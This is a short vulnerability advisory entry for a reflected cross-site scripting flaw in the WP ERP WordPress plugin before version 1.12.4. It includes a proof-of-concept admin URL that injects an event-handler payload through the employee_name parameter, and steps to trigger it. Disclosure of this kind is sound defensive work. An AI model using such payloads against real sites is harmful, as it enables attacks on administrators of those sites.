Lucene search

K
wpexploitAlex SanfordWPEX-ID:517C6AA4-A56D-4F13-B370-7C864DD9C7DB
HistoryJun 05, 2023 - 12:00 a.m.

WP ERP < 1.12.4 - Reflected Cross-Site Scripting

2023-06-0500:00:00
Alex Sanford
53
wp erp
cross-site scripting
admin
url
filter leave requests
exploit

0.001 Low

EPSS

Percentile

20.5%

The plugin does not sanitise and escape the employee_name parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin.

As an admin user, visit the following URL on the site:

/wp-admin/admin.php?page=erp-hr&section=leave&employee_name=employee123"+style%3Danimation-name%3Arotation+onanimationstart%3Dalert(%2FXSS%2F)%2F%2F

Click on the "Filter Leave Requests" button to trigger the XSS.

0.001 Low

EPSS

Percentile

20.5%

Related for WPEX-ID:517C6AA4-A56D-4F13-B370-7C864DD9C7DB